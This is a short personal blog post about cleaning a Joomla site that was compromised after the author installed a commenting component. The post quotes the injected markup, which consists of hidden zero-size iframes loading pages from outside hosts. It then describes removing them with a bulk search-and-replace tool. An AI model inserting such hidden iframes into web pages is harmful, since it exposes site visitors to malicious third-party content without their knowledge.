Joomla! iframe injection / hack
I noticed a while ago when I installed a Commenting component for Joomla – com_comment – Looking through the source code, and even loading the page, it was pulling in random Analytic websites that looked a bit fake.
I didn’t really think much of it, until Sophos antivirus was blocking the page, no other antivirus had detected there were threats.
What had happened was the Source Code there were a heap of empty iframes, like;
<iframe src=”http://yahoo-analytics.net/count.php?o=2″ width=0 height=0 style=”hidden” frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src=”http://pinoc.org/count.php?o=2″ width=0 height=0 style=”hidden” frameborder=0 marginheight=0 marginwidth=0 scrolling=no>…… etc
I read on Floggs Blog, a way to fix it, however that system didn’t help me fix it, no way I was going through 50 odd html and php files and deleting the bad HTML. So I found the Mass Text Replacer which did the job perfectly!
I downloaded the entire website to my PC and then within that software, opened every *.html and *.php file and did a simple Search and Replace feature. Dreamweaver, Notepad++ and E editor could not do this. So there is my hand peice of software for today!
